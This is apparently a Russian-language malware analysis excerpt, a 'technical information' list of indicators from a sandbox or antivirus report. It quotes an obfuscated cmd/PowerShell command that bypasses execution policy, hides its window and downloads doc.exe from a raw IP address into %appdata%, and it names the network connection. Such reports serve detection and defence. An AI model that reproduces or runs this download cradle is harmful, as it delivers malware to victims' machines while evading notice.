Техническая информация
- http://185.11.146.249/download/doc.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwerS^H^ELL.^exE -e^xECutI^onPoLi^C^y^ BY^P^A^SS -n^OPR^OfILE^ -win^D^oWsT^Y^le h^iDD^eN (neW^-o^bJeCT sysTEm.^NEt.w^EBC^lIent)^.^dow^NLOad^fiLE^(^'http://185.11.146.249/down...
- '18#.#1.146.249':80
- '<SYSTEM32>\cmd.exe' /C "pOwerS^H^ELL.^exE -e^xECutI^onPoLi^C^y^ BY^P^A^SS -n^OPR^OfILE^ -win^D^oWsT^Y^le h^iDD^eN (neW^-o^bJeCT sysTEm.^NEt.w^EBC^lIent)^.^dow^NLOad^fiLE^(^'http://185.11.146.249/down...' (со скрытым окном)